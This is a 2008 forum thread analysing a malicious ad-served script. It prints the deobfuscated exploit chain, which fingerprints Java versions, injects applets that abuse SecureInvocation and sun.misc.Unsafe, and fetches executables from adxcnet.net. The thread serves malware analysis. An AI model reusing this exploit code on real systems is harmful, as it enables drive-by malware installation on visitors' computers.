Author Topic: Anybody know what this does? (2)  (Read 9201 times)


August 02, 2008, 10:49:25 pm

JohnC

Series of scripts/iframes:

http://freehomepages.com/astronomie/inceputuri.html
http://creative.clicksor.com/46821/c1067162256.html
http://especialads.com/banner/show.php?cid=1164623&tid=5014218916&sv=180x150

From: http://adxcnet.net/code/smain.php?scout=jvcxeng

<script language="javascript">
// Standard base64 alphabet. The sample assembles it from fragments, so the
// complete alphabet never appears as one literal in the page source.
var chrstr = "ABCDEFG"
  + "HIJKLMNO"
  + "PQRSTUVWXYZabcdef"
  + "ghijklmnopqrstuvwxyz0123456789+/";

/**
 * Base64 decoder used by the dropper page to unpack its next stage.
 *
 * Input is consumed four characters at a time; each group yields three
 * output characters. Trailing '=' padding (char code 61) is handled after the
 * loop by trimming one or two characters from the decoded string.
 *
 * @param {string} ecstr1718 - base64 text to decode
 * @returns {string} decoded text, one character per decoded byte
 */
function sdf718d(ecstr1718) {
  // Alphabet position of the character at `pos`. indexOf gives -1 for '=' and
  // for anything outside the alphabet; the mask turns that into 0xff.
  var sextetAt = function (pos) {
    return chrstr.indexOf(ecstr1718.charAt(pos)) & 0xff;
  };

  var decoded = "";
  var offset = 0;
  while (offset < ecstr1718.length) {
    var group = sextetAt(offset) << 18
      | sextetAt(offset + 1) << 12
      | sextetAt(offset + 2) << 6
      | sextetAt(offset + 3);
    decoded += String.fromCharCode(
      (group >> 16) & 0xff,
      (group >> 8) & 0xff,
      group & 0xff
    );
    offset += 4;
  }

  // `offset` now sits just past the last group, so offset-2 / offset-1 are the
  // two positions where padding can appear.
  var trim = 0;
  if (ecstr1718.charCodeAt(offset - 2) == 61) {
    trim = 2;
  } else if (ecstr1718.charCodeAt(offset - 1) == 61) {
    trim = 1;
  }
  if (trim === 0) {
    return decoded;
  }
  return decoded.substring(0, decoded.length - trim);
}
// Unpacks the next stage: the string literal is passed through unescape(), base64-decoded
// by sdf718d(), and the result is written into the page as markup with document.write().
// The visible prefix "LS0t" decodes to "---"; the remainder of the encoded string is not
// reproduced in this listing, so the decoded output cannot be re-derived from this line alone.
// NOTE(review): the script quoted in Reply #1 is presumably the decoded stage — confirm against a full capture.
document.write(sdf718d(unescape("LS0t"+"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")));
</script>
 

adxcnet.net/code/jvmvers.jar
http://www.virustotal.com/analisis/e24c42aee3ba1bf602b8aa0def38b177

Both the script and that JAR file have 0 detections on VirusTotal, but a Google search for the domain suggests it is probably malicious:
http://www.google.com/search?q=adxcnet.net

August 03, 2008, 06:02:38 am
Reply #1

bobby

There is more than one JAR file; which one is used depends on the browser version. You can also see a link to an exe in the deobfuscated script.

<script language="javascript">
// Gate for the whole script: nothing below runs unless the browser reports Java as enabled.
if(navigator.javaEnabled()) {

// Handles for the applets that printjameth() may inject later.
// NOTE(review): jvmiproc is declared here, but printjameth() assigns to jvmimpro instead,
// which therefore becomes an undeclared (implicit global) variable.
var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
// Retry counters for the polling loops: i (jvloadc / jvloadfc), x (sjvsecc), z (sjvusafc).
var i=0; var x=0; var z=0;
// Browser split: an appName containing "microsoft" selects the Internet Explorer branch.
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
// Builds a detached <div> and attaches IE's "#default#clientCaps" behavior to it so that
// GetVersion() can query installed components. oClientCaps is assigned without var, so it
// is an implicit global. Any failure is swallowed by the empty catch.
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

// Looks up an installed IE component through the clientCaps object.
// Returns the component's version split on "," (an array of strings) when the component
// is installed, or Array(0,0,0,0) when it is not. If the clientCaps call throws, the empty
// catch swallows the error and the function returns undefined.
function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
       
// Version fields of the component with this CLSID, as reported by clientCaps.
// NOTE(review): the CLSID looks like the one registered for the Microsoft Java VM, which
// matches how definemsm() uses jvoc together with the "Microsoft" vendor test — confirm.
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
// Injects a 1x1 probe applet (archive jvmvers.jar, class vmain.class). The script later
// reads jversion / jvendor from this element to fingerprint the JVM.
// Indicator for triage: a 1x1 <applet> appended from script with a relative archive name.
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);


//window.onload = definemsm;
// IE branch poller: waits for the probe applet to expose a jversion property, then calls
// definemsm(). It re-arms itself every 300 ms and gives up after 30 checks (counter i).
// The timers use string arguments, so the callback is evaluated by name in global scope;
// a sandbox or emulator needs that name resolvable there for the chain to continue.
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

// IE branch: turns the probe applet's version/vendor strings into four booleans and passes
// them to printjameth(), which decides which further applets to inject.
// All errors are swallowed by the outer try/catch, so a failed probe simply injects nothing.
function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
// Coerce the applet-reported version and vendor to strings.
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
// jvja = dot-separated version fields, or the placeholder (0,0,"0_0") when there is no ".".
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
// Third field is split on "_" into two parts (presumably "<patch>_<update>" — confirm).
var jvjas = jvja[2].split("_");
// The fields are strings; the comparisons below rely on implicit numeric coercion.
// sjmsjvm: clientCaps reported the component (first field non-zero, third field < 3810),
// the applet version has second field < 2 or first field 0, and the vendor contains "Microsoft".
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
// sjsecmn: first field non-zero and either second field <= 3, or second field <= 4 with
// "_" parts <= 2 and < 6. Note 06 is a legacy octal literal (value 6) and is a syntax
// error in strict mode, which matters when replaying the sample in a strict-mode harness.
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
// sjusafe: first field non-zero and either second field <= 4, or second field <= 5 with
// "_" parts == 0 and < 2.
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
// sjiproc: first field non-zero and either second field == 5 with "_" parts == 0 and < 10,
// or second field == 4 with "_" parts == 2 and strictly between 5 and 13.
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
// A JVM outside all four ranges leaves every flag false, and printjameth() then adds nothing.
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers
// Three ways of learning the Java version are tried in order. jvjs ends up either falsy
// or an array of the dot-separated version fields.

// Get Script version
// First attempt: read java.version through the LiveConnect `java` global. If that global
// is unavailable the access throws, the catch swallows it, and jvjs stays undefined.
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
// Second attempt: take the part of the "Java Plug-in" plugin description that runs from
// the first "1" up to the next space, and split it on ".".
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
// Last resort: inject the same 1x1 probe applet (jvmvers.jar / vmain.class) that the IE
// branch uses, and read the version from it once it has loaded.
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

// Scheduling for the non-IE branch. When no version is known yet, poll the probe applet
// every 300 ms (at most 30 checks, shared counter i) until it exposes jversion, then call
// defineffm(). When a version was already obtained, call defineffm() after 100 ms.
// jvloadfc is a function declaration inside an if block, so its visibility depends on the
// engine's sloppy-mode handling of block-level functions; the string timers need it to be
// resolvable by name in global scope.
if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

// Non-IE counterpart of definemsm(): derives the same four booleans from the version
// fields in jvjs and passes them to printjameth(). Errors are swallowed by the outer
// try/catch; if no version could be obtained at all, nothing is injected.
function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
// Fall back to the probe applet's jversion when the earlier attempts produced nothing.
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
// Third field split on "_" into two parts (presumably "<patch>_<update>" — confirm).
var jvjss = jvjs[2].split("_");
// Fields are strings; comparisons rely on implicit numeric coercion.
// sjmsjvm: first field non-zero and second field < 2 (no vendor or clientCaps test here,
// unlike the IE branch). The repeated `var` is a harmless redeclaration.
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
// sjsecmn: second field <= 3, or second field <= 4 with "_" parts <= 2 and < 6.
// 06 is a legacy octal literal (value 6); it is rejected in strict mode.
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
// sjusafe: second field <= 4, or second field <= 5 with "_" parts == 0 and < 2.
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
// sjiproc: second field == 5 with "_" parts == 0 and < 10, or second field == 4 with
// "_" parts == 2 and strictly between 5 and 13.
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }


} // End Else Not IE


// Injects up to four further 1x1 applets, one per flag computed by definemsm()/defineffm().
// The flags are independent, so more than one applet can be added for the same visitor.
// jvers is only used by the commented-out debug alert. Errors are swallowed.
// Indicators visible here: archive names jvmmsvm.jar, jvmsecman.jar, jvmusafe.jar and
// jvmimpro.jar (relative, so presumably served next to the hosting page — confirm), class
// vmain.class, and the two executable URLs passed in the "sdata" parameter.
function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

// Microsoft-VM case: the applet receives the ";"-separated URL list as a <param>, so no
// further script interaction is needed for this one.
if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://adxcnet.net/xrun.exe;http://adxcnet.net/xpre.exe";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

// After injection the script starts polling sjvsecc(), which calls sjvmsec() once the
// applet is scriptable.
if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

// Same pattern: inject, then poll sjvusafc(), which calls sjvmusaf().
if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

// No follow-up script call and no <param> for this applet. jvmimpro is never declared
// (the var list at the top of the script names jvmiproc), so it is an implicit global.
if(sjiproc) {
jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
document.body.appendChild(jvmimpro);
}
}catch(e) {} }



// Poller for the jvmsecman.jar applet: waits until the element exposes getClass (i.e. the
// applet can be called from script), then runs sjvmsec(). Checks every 300 ms and gives up
// after 30 checks (counter x).
function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
// Uses the applet's getClass().forName() from page script to obtain Class objects for
// sun.plugin.liveconnect.SecureInvocation, java.lang.System and java.lang.SecurityManager,
// then passes them, together with the ";"-separated executable URLs, to the applet's main().
// What main() does with them is not visible in this script; Reply #3 in the thread reports
// that the JARs download and run a file from the URL they are given.
// Detection note: page script resolving these class names through an applet is not normal
// site behaviour. All errors are swallowed, so failure is silent for the visitor.
function sjvmsec() { try {
var sda="http://adxcnet.net/xrun.exe;http://adxcnet.net/xpre.exe";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }



// Poller for the jvmusafe.jar applet: waits until the element exposes getClass, then runs
// sjvmusaf(). Checks every 300 ms and gives up after 30 checks (counter z).
function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
// Obtains sun.misc.Unsafe through reflection from page script (forName, then getMethod
// "getUnsafe", then invoke), hands the instance to the applet's main(), and then asks it to
// define a class named "vlocal" from data the applet exposes as bclass / classsz. An
// instance of that class is allocated and its vload() is called with the Unsafe handle and
// the ";"-separated executable URLs. The contents of "vlocal" are not visible in this
// script; they come from the JAR.
// Detection note: script-driven access to sun.misc.Unsafe via an applet is a strong
// indicator of a sandbox-escape attempt. Errors are swallowed (catch(d) is empty).
function sjvmusaf() { try {
var sda = "http://adxcnet.net/xrun.exe;http://adxcnet.net/xpre.exe";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }


}  // end javaenabled
</script>

I'll take a look at the JAR files now.

August 03, 2008, 06:15:47 am
Reply #2

CM_MWR

http://adxcnet.net/xrun.exe
http://adxcnet.net/xpre.exe

Mucho Malware---Lots of crapwareadwares.

I'll usually see these at a crack site as a banner or a pop-up; once they hit, the s*it hits the fan hard.

August 03, 2008, 06:33:46 am
Reply #3

bobby

The JAR files are used to determine the JVM version (MS or Sun), and to download and run a file fetched from a URL passed as an argument.

August 03, 2008, 02:46:41 pm
Reply #4

JohnC
